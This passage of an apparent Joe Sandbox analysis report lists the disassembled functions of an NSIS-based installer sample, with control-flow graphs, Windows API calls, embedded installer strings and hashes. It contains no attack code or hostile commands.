                                                                                              • Opcode Fuzzy Hash: 2fa3fc2bddc204e922c82fa426c5bb1cc5fbaa7aed8e5e7daaeaf6592e3c6ac6
                                                                                              • Instruction Fuzzy Hash: A8D01232200111D7C7005FA5AD48A5FB77DAE95A11706843AF902F3171E734D911E6EC
                                                                                              Function 004015A0 Relevance: 56.4, APIs: 15, Strings: 17, Instructions: 351sleepfilewindowCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 56 4015a0-4015f4 57 4030e3-4030ec 56->57 58 4015fa 56->58 86 4030ee-4030f2 57->86 60 401601-401611 call 4062cf 58->60 61 401742-40174f 58->61 62 401962-40197d call 40145c GetFullPathNameW 58->62 63 4019ca-4019e6 call 40145c SearchPathW 58->63 64 40176e-401794 call 40145c call 4062cf SetFileAttributesW 58->64 65 401650-40166d call 40137e call 4062cf call 40139d 58->65 66 4017b1-4017d8 call 40145c call 4062cf call 405d85 58->66 67 401672-401686 call 40145c call 4062cf 58->67 68 401693-4016ac call 401446 call 4062cf 58->68 69 401715-401731 58->69 70 401616-40162d call 40145c call 4062cf call 404f9e 58->70 71 4016d6-4016db 58->71 72 401736-40173d 58->72 73 401897-4018a7 call 40145c call 406301 58->73 74 4018db-401910 call 40145c * 3 call 4062cf MoveFileW 58->74 75 40163c-401645 58->75 76 4016bd-4016d1 call 4062cf SetForegroundWindow 58->76 60->86 77 401751-401755 ShowWindow 61->77 78 401758-40175f 61->78 117 4019a3-4019a8 62->117 118 40197f-401984 62->118 63->57 123 4019ec-4019f8 63->123 64->57 136 40179a-4017a6 call 4062cf 64->136 65->86 160 401864-40186c 66->160 161 4017de-4017fc call 405d32 CreateDirectoryW 66->161 137 401689-40168e call 404f9e 67->137 142 4016b1-4016b8 Sleep 68->142 143 4016ae-4016b0 68->143 69->86 94 401632-401637 70->94 92 401702-401710 71->92 93 4016dd-4016fd call 401446 71->93 96 4030dd-4030de 72->96 138 4018c2-4018d6 call 4062cf 73->138 139 4018a9-4018bd call 4062cf 73->139 172 401912-401919 74->172 173 40191e-401921 74->173 75->94 95 401647-40164e PostQuitMessage 75->95 76->57 77->78 78->57 99 401765-401769 ShowWindow 78->99 92->57 93->57 94->86 95->94 96->57 113 4030de call 405f7d 96->113 99->57 113->57 130 4019af-4019b2 117->130 129 401986-401989 118->129 118->130 123->57 123->96 129->130 140 40198b-401993 call 406301 129->140 130->57 144 4019b8-4019c5 GetShortPathNameW 130->144 155 4017ab-4017ac 136->155 137->57 138->86 139->86 140->117 165 401995-4019a1 call 406035 140->165 142->57 143->142 144->57 155->57 163 401890-401892 160->163 164 40186e-40188b call 404f9e call 406035 SetCurrentDirectoryW 160->164 176 401846-40184e call 4062cf 161->176 177 4017fe-401809 GetLastError 161->177 163->137 164->57 165->130 172->137 178 401923-40192b call 406301 173->178 179 40194a-401950 173->179 192 401853-401854 176->192 182 401827-401832 GetFileAttributesW 177->182 183 40180b-401825 GetLastError call 4062cf 177->183 178->179 193 40192d-401948 call 406c94 call 404f9e 178->193 181 401957-40195d call 4062cf 179->181 181->155 190 401834-401844 call 4062cf 182->190 191 401855-40185e 182->191 183->191 190->192 191->160 191->161 192->191 193->181
                                                                                              APIs
                                                                                              • PostQuitMessage.USER32(00000000), ref: 00401648
                                                                                              • Sleep.KERNELBASE(00000000,?,00000000,00000000,00000000), ref: 004016B2
                                                                                              • SetForegroundWindow.USER32(?), ref: 004016CB
                                                                                              • ShowWindow.USER32(?), ref: 00401753
                                                                                              • ShowWindow.USER32(?), ref: 00401767
                                                                                              • SetFileAttributesW.KERNEL32(00000000,00000000,?,000000F0), ref: 0040178C
                                                                                              • CreateDirectoryW.KERNELBASE(?,00000000,00000000,0000005C,?,?,?,000000F0,?,000000F0), ref: 004017F4
                                                                                              • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 004017FE
                                                                                              • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 0040180B
                                                                                              • GetFileAttributesW.KERNELBASE(?,?,?,000000F0,?,000000F0), ref: 0040182A
                                                                                              • SetCurrentDirectoryW.KERNELBASE(?,004D70B0,?,000000E6,004100F0,?,?,?,000000F0,?,000000F0), ref: 00401885
                                                                                              • MoveFileW.KERNEL32(00000000,?), ref: 00401908
                                                                                              • GetFullPathNameW.KERNEL32(00000000,00002004,00000000,?,00000000,000000E3,004100F0,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 00401975
                                                                                              • GetShortPathNameW.KERNEL32(00000000,00000000,00002004), ref: 004019BF
                                                                                              • SearchPathW.KERNELBASE(00000000,00000000,00000000,00002004,00000000,?,000000FF,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 004019DE
                                                                                              Strings
                                                                                              • IfFileExists: file "%s" does not exist, jumping %d, xrefs: 004018C6
                                                                                              • CreateDirectory: can't create "%s" - a file already exists, xrefs: 00401837
                                                                                              • Rename: %s, xrefs: 004018F8
                                                                                              • Rename on reboot: %s, xrefs: 00401943
                                                                                              • Aborting: "%s", xrefs: 0040161D
                                                                                              • Call: %d, xrefs: 0040165A
                                                                                              • IfFileExists: file "%s" exists, jumping %d, xrefs: 004018AD
                                                                                              • SetFileAttributes failed., xrefs: 004017A1
                                                                                              • CreateDirectory: can't create "%s" (err=%d), xrefs: 00401815
                                                                                              • Sleep(%d), xrefs: 0040169D
                                                                                              • Jump: %d, xrefs: 00401602
                                                                                              • CreateDirectory: "%s" created, xrefs: 00401849
                                                                                              • SetFileAttributes: "%s":%08X, xrefs: 0040177B
                                                                                              • BringToFront, xrefs: 004016BD
                                                                                              • detailprint: %s, xrefs: 00401679
                                                                                              • Rename failed: %s, xrefs: 0040194B
                                                                                              • CreateDirectory: "%s" (%d), xrefs: 004017BF
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2118789606.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2118775307.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118804743.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118895843.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_DM6vAAgoCw.jbxd
                                                                                              Similarity
                                                                                              • API ID: FilePathWindow$AttributesDirectoryErrorLastNameShow$CreateCurrentForegroundFullMessageMovePostQuitSearchShortSleep
                                                                                              • String ID: Aborting: "%s"$BringToFront$Call: %d$CreateDirectory: "%s" (%d)$CreateDirectory: "%s" created$CreateDirectory: can't create "%s" (err=%d)$CreateDirectory: can't create "%s" - a file already exists$IfFileExists: file "%s" does not exist, jumping %d$IfFileExists: file "%s" exists, jumping %d$Jump: %d$Rename failed: %s$Rename on reboot: %s$Rename: %s$SetFileAttributes failed.$SetFileAttributes: "%s":%08X$Sleep(%d)$detailprint: %s
                                                                                              • API String ID: 2872004960-3619442763
                                                                                              • Opcode ID: cb44afc3f00204bc7321e8aa54be61598e0149da34aa070ef9c2be04eb5c6a73
                                                                                              • Instruction ID: d546d874ac51cf0a7c72b7d7aee7a5a926bf82a1b22bfeef9e4f81a1fba4758f
                                                                                              • Opcode Fuzzy Hash: cb44afc3f00204bc7321e8aa54be61598e0149da34aa070ef9c2be04eb5c6a73
                                                                                              • Instruction Fuzzy Hash: 9EB1F435A00214ABDB10BFA1DD55DAE3F69EF44324B21817FF806B61E2DA3D4E40C66D
                                                                                              Function 004054A5 Relevance: 48.3, APIs: 32, Instructions: 345windowstringCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 323 4054a5-4054b7 324 4055f9-405608 323->324 325 4054bd-4054c3 323->325 327 405657-40566c 324->327 328 40560a-405652 GetDlgItem * 2 call 403d6b SetClassLongW call 40141d 324->328 325->324 326 4054c9-4054d2 325->326 331 4054d4-4054e1 SetWindowPos 326->331 332 4054e7-4054ea 326->332 329 4056ac-4056b1 call 403ddb 327->329 330 40566e-405671 327->330 328->327 342 4056b6-4056d1 329->342 334 405673-40567e call 40139d 330->334 335 4056a4-4056a6 330->335 331->332 337 405504-40550a 332->337 338 4054ec-4054fe ShowWindow 332->338 334->335 356 405680-40569f SendMessageW 334->356 335->329 341 40594c 335->341 343 405526-405529 337->343 344 40550c-405521 DestroyWindow 337->344 338->337 351 40594e-405955 341->351 349 4056d3-4056d5 call 40141d 342->349 350 4056da-4056e0 342->350 346 40552b-405537 SetWindowLongW 343->346 347 40553c-405542 343->347 352 405929-40592f 344->352 346->351 354 4055e5-4055f4 call 403df6 347->354 355 405548-405559 GetDlgItem 347->355 349->350 359 4056e6-4056f1 350->359 360 40590a-405923 DestroyWindow KiUserCallbackDispatcher 350->360 352->341 357 405931-405937 352->357 354->351 361 405578-40557b 355->361 362 40555b-405572 SendMessageW IsWindowEnabled 355->362 356->351 357->341 364 405939-405942 ShowWindow 357->364 359->360 365 4056f7-405744 call 406831 call 403d6b * 3 GetDlgItem 359->365 360->352 366 405580-405583 361->366 367 40557d-40557e 361->367 362->341 362->361 364->341 393 405746-40574c 365->393 394 40574f-40578b ShowWindow KiUserCallbackDispatcher call 403db1 EnableWindow 365->394 372 405591-405596 366->372 373 405585-40558b 366->373 371 4055ae-4055b3 call 403d44 367->371 371->354 376 4055cc-4055df SendMessageW 372->376 378 405598-40559e 372->378 373->376 377 40558d-40558f 373->377 376->354 377->371 381 4055a0-4055a6 call 40141d 378->381 382 4055b5-4055be call 40141d 378->382 391 4055ac 381->391 382->354 390 4055c0-4055ca 382->390 390->391 391->371 393->394 397 405790 394->397 398 40578d-40578e 394->398 399 405792-4057c0 GetSystemMenu EnableMenuItem SendMessageW 397->399 398->399 400 4057c2-4057d3 SendMessageW 399->400 401 4057d5 399->401 402 4057db-405819 call 403dc4 call 406035 lstrlenW call 406831 SetWindowTextW call 40139d 400->402 401->402 402->342 411 40581f-405821 402->411 411->342 412 405827-40582b 411->412 413 40584a-40585e DestroyWindow 412->413 414 40582d-405833 412->414 413->352 416 405864-405891 CreateDialogParamW 413->416 414->341 415 405839-40583f 414->415 415->342 418 405845 415->418 416->352 417 405897-4058ee call 403d6b GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 40139d 416->417 417->341 423 4058f0-405903 ShowWindow call 403ddb 417->423 418->341 425 405908 423->425 425->352
                                                                                              APIs
                                                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004054E1
                                                                                              • ShowWindow.USER32(?), ref: 004054FE
                                                                                              • DestroyWindow.USER32 ref: 00405512
                                                                                              • SetWindowLongW.USER32(?,00000000,00000000), ref: 0040552E
                                                                                              • GetDlgItem.USER32(?,?), ref: 0040554F
                                                                                              • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00405563
                                                                                              • IsWindowEnabled.USER32(00000000), ref: 0040556A
                                                                                              • GetDlgItem.USER32(?,00000001), ref: 00405619
                                                                                              • GetDlgItem.USER32(?,00000002), ref: 00405623
                                                                                              • SetClassLongW.USER32(?,000000F2,?), ref: 0040563D
                                                                                              • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 0040568E
                                                                                              • GetDlgItem.USER32(?,00000003), ref: 00405734
                                                                                              • ShowWindow.USER32(00000000,?), ref: 00405756
                                                                                              • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00405768
                                                                                              • EnableWindow.USER32(?,?), ref: 00405783
                                                                                              • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00405799
                                                                                              • EnableMenuItem.USER32(00000000), ref: 004057A0
                                                                                              • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004057B8
                                                                                              • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004057CB
                                                                                              • lstrlenW.KERNEL32(00451D98,?,00451D98,00476AA0), ref: 004057F4
                                                                                              • SetWindowTextW.USER32(?,00451D98), ref: 00405808
                                                                                              • ShowWindow.USER32(?,0000000A), ref: 0040593C
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2118789606.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2118775307.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118804743.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118895843.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_DM6vAAgoCw.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                              • String ID:
                                                                                              • API String ID: 3282139019-0
                                                                                              • Opcode ID: 368de82205cbc4940732e302d2e847697efd4030890e1d8fceca6bf2533b68ed
                                                                                              • Instruction ID: f960999a9681c69a960cfafceaa395f4ab6c0ab2fcbff8166cb7657a87eea2d0
                                                                                              • Opcode Fuzzy Hash: 368de82205cbc4940732e302d2e847697efd4030890e1d8fceca6bf2533b68ed
                                                                                              • Instruction Fuzzy Hash: 13C189B1500A04FBDB216F61ED89E2B7BA9EB49715F00093EF506B11F1C6399881DF2E
                                                                                              Function 00405958 Relevance: 45.7, APIs: 15, Strings: 11, Instructions: 233stringregistrylibraryCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 426 405958-405970 call 406328 429 405972-405982 call 405f7d 426->429 430 405984-4059bc call 405eff 426->430 439 4059df-405a08 call 403ec1 call 4067aa 429->439 435 4059d4-4059da lstrcatW 430->435 436 4059be-4059cf call 405eff 430->436 435->439 436->435 444 405a9c-405aa4 call 4067aa 439->444 445 405a0e-405a13 439->445 451 405ab2-405ab9 444->451 452 405aa6-405aad call 406831 444->452 445->444 447 405a19-405a41 call 405eff 445->447 447->444 453 405a43-405a47 447->453 455 405ad2-405af7 LoadImageW 451->455 456 405abb-405ac1 451->456 452->451 457 405a49-405a58 call 405d32 453->457 458 405a5b-405a67 lstrlenW 453->458 460 405b92-405b9a call 40141d 455->460 461 405afd-405b3f RegisterClassW 455->461 456->455 459 405ac3-405ac8 call 403ea0 456->459 457->458 463 405a69-405a77 lstrcmpiW 458->463 464 405a8f-405a97 call 40674e call 406035 458->464 459->455 475 405ba4-405baf call 403ec1 460->475 476 405b9c-405b9f 460->476 466 405c61 461->466 467 405b45-405b8d SystemParametersInfoW CreateWindowExW 461->467 463->464 471 405a79-405a83 GetFileAttributesW 463->471 464->444 470 405c63-405c6a 466->470 467->460 477 405a85-405a87 471->477 478 405a89-405a8a call 40677d 471->478 484 405bb5-405bd2 ShowWindow LoadLibraryW 475->484 485 405c38-405c39 call 405073 475->485 476->470 477->464 477->478 478->464 486 405bd4-405bd9 LoadLibraryW 484->486 487 405bdb-405bed GetClassInfoW 484->487 491 405c3e-405c40 485->491 486->487 489 405c05-405c28 DialogBoxParamW call 40141d 487->489 490 405bef-405bff GetClassInfoW RegisterClassW 487->490 497 405c2d-405c36 call 403c94 489->497 490->489 492 405c42-405c48 491->492 493 405c5a-405c5c call 40141d 491->493 492->476 495 405c4e-405c55 call 40141d 492->495 493->466 495->476 497->470
                                                                                              APIs
                                                                                                • Part of subcall function 00406328: GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                                                                                • Part of subcall function 00406328: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                                                                                • Part of subcall function 00406328: GetProcAddress.KERNEL32(00000000), ref: 00406353
                                                                                              • lstrcatW.KERNEL32(004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006,004CF0A0,-00000002,00000000,004E30C8,00403AED,?), ref: 004059DA
                                                                                              • lstrlenW.KERNEL32(0046E220,?,?,?,0046E220,00000000,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006,004CF0A0), ref: 00405A5C
                                                                                              • lstrcmpiW.KERNEL32(0046E218,.exe,0046E220,?,?,?,0046E220,00000000,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000), ref: 00405A6F
                                                                                              • GetFileAttributesW.KERNEL32(0046E220), ref: 00405A7A
                                                                                                • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                                                                              • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,004D30A8), ref: 00405AE3
                                                                                              • RegisterClassW.USER32(00476A40), ref: 00405B36
                                                                                              • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00405B4E
                                                                                              • CreateWindowExW.USER32(00000080,?,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00405B87
                                                                                                • Part of subcall function 00403EC1: SetWindowTextW.USER32(00000000,00476AA0), ref: 00403F5C
                                                                                              • ShowWindow.USER32(00000005,00000000), ref: 00405BBD
                                                                                              • LoadLibraryW.KERNELBASE(RichEd20), ref: 00405BCE
                                                                                              • LoadLibraryW.KERNEL32(RichEd32), ref: 00405BD9
                                                                                              • GetClassInfoW.USER32(00000000,RichEdit20A,00476A40), ref: 00405BE9
                                                                                              • GetClassInfoW.USER32(00000000,RichEdit,00476A40), ref: 00405BF6
                                                                                              • RegisterClassW.USER32(00476A40), ref: 00405BFF
                                                                                              • DialogBoxParamW.USER32(?,00000000,004054A5,00000000), ref: 00405C1E
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2118789606.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2118775307.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118804743.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118895843.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_DM6vAAgoCw.jbxd
                                                                                              Similarity
                                                                                              • API ID: ClassLoad$InfoLibraryWindow$Register$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemTextlstrcatlstrcmpilstrlenwsprintf
                                                                                              • String ID: F$"F$.DEFAULT\Control Panel\International$.exe$@jG$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                                                              • API String ID: 608394941-2746725676
                                                                                              • Opcode ID: ff750bfe5142f8154025b48725ed66ec952ceebe161b5cb34577f361fd6f9efb
                                                                                              • Instruction ID: c846f8899feab6000a015ad3d9ba4b80e1385b5ee8e185a3118195eaaf4def2f
                                                                                              • Opcode Fuzzy Hash: ff750bfe5142f8154025b48725ed66ec952ceebe161b5cb34577f361fd6f9efb
                                                                                              • Instruction Fuzzy Hash: 53719175600705AEE710AB65AD89E2B37ACEB44718F00453FF906B62E2D778AC41CF6D
                                                                                              Function 00401A1F Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 185stringtimeCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                                • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                              • lstrcatW.KERNEL32(00000000,00000000,open,004D70B0,00000000,00000000), ref: 00401A76
                                                                                              • CompareFileTime.KERNEL32(-00000014,?,open,open,00000000,00000000,open,004D70B0,00000000,00000000), ref: 00401AA0
                                                                                                • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,004241C1,762323A0,00000000), ref: 00404FD6
                                                                                                • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,004241C1,762323A0,00000000), ref: 00404FE6
                                                                                                • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,004241C1,762323A0,00000000), ref: 00404FF9
                                                                                                • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2118789606.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2118775307.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118804743.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118895843.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_DM6vAAgoCw.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSendlstrlen$lstrcat$CompareFileTextTimeWindowlstrcpynwvsprintf
                                                                                              • String ID: File: error creating "%s"$File: error, user abort$File: error, user cancel$File: error, user retry$File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"$File: skipped: "%s" (overwriteflag=%d)$File: wrote %d to "%s"$open
                                                                                              • API String ID: 4286501637-2478300759
                                                                                              • Opcode ID: e66e3e702844fd7f079e7b10ae6de895f6d273da0ae026ac64afba16485083bb
                                                                                              • Instruction ID: 90fa90950dbbf035c4f81507b49f49b55cd41b97b653845b504dd01eb698d819
                                                                                              • Opcode Fuzzy Hash: e66e3e702844fd7f079e7b10ae6de895f6d273da0ae026ac64afba16485083bb
                                                                                              • Instruction Fuzzy Hash: 8B512931901214BADB10BBB5CC46EEE3979EF05378B20423FF416B11E2DB3C9A518A6D
                                                                                              Function 004035B3 Relevance: 19.4, APIs: 5, Strings: 6, Instructions: 182COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 587 4035b3-403601 GetTickCount GetModuleFileNameW call 405e7c 590 403603-403608 587->590 591 40360d-40363b call 406035 call 40677d call 406035 GetFileSize 587->591 592 4037e2-4037e6 590->592 599 403641 591->599 600 403728-403736 call 4032d2 591->600 602 403646-40365d 599->602 606 4037f1-4037f6 600->606 607 40373c-40373f 600->607 604 403661-403663 call 403336 602->604 605 40365f 602->605 611 403668-40366a 604->611 605->604 606->592 609 403741-403759 call 403368 call 403336 607->609 610 40376b-403795 GlobalAlloc call 403368 call 40337f 607->610 609->606 638 40375f-403765 609->638 610->606 636 403797-4037a8 610->636 614 403670-403677 611->614 615 4037e9-4037f0 call 4032d2 611->615 616 4036f3-4036f7 614->616 617 403679-40368d call 405e38 614->617 615->606 623 403701-403707 616->623 624 4036f9-403700 call 4032d2 616->624 617->623 634 40368f-403696 617->634 627 403716-403720 623->627 628 403709-403713 call 4072ad 623->628 624->623 627->602 635 403726 627->635 628->627 634->623 640 403698-40369f 634->640 635->600 641 4037b0-4037b3 636->641 642 4037aa 636->642 638->606 638->610 640->623 643 4036a1-4036a8 640->643 644 4037b6-4037be 641->644 642->641 643->623 645 4036aa-4036b1 643->645 644->644 646 4037c0-4037db SetFilePointer call 405e38 644->646 645->623 647 4036b3-4036d3 645->647 650 4037e0 646->650 647->606 649 4036d9-4036dd 647->649 651 4036e5-4036ed 649->651 652 4036df-4036e3 649->652 650->592 651->623 653 4036ef-4036f1 651->653 652->635 652->651 653->623
                                                                                              APIs
                                                                                              • GetTickCount.KERNEL32 ref: 004035C4
                                                                                              • GetModuleFileNameW.KERNEL32(00000000,004EB0D8,00002004,?,?,?,00000000,00403A73,?), ref: 004035E0
                                                                                                • Part of subcall function 00405E7C: GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                                                                                • Part of subcall function 00405E7C: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                                                                              • GetFileSize.KERNEL32(00000000,00000000,004EF0E0,00000000,004DB0B8,004DB0B8,004EB0D8,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 0040362C
                                                                                              Strings
                                                                                              • f%o, xrefs: 00403632
                                                                                              • Error launching installer, xrefs: 00403603
                                                                                              • Inst, xrefs: 00403698
                                                                                              • soft, xrefs: 004036A1
                                                                                              • Null, xrefs: 004036AA
                                                                                              • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004037F1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2118789606.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2118775307.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118804743.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118895843.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_DM6vAAgoCw.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                              • String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$f%o$soft
                                                                                              • API String ID: 4283519449-775354024
                                                                                              • Opcode ID: 1c468bae64f21cc984bb13b12bce4b19fca03feff63e1d2e4bd855413efb252c
                                                                                              • Instruction ID: dd9ffda97dac1e18d9081c595fe0b3a994810ea71df15e1d022794f6b5594c79
                                                                                              • Opcode Fuzzy Hash: 1c468bae64f21cc984bb13b12bce4b19fca03feff63e1d2e4bd855413efb252c
                                                                                              • Instruction Fuzzy Hash: 8551B8B1900214AFDB20DFA5DC85B9E7EACAB1435AF60857BF905B72D1C7389E408B5C
                                                                                              Function 0040337F Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 175fileCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
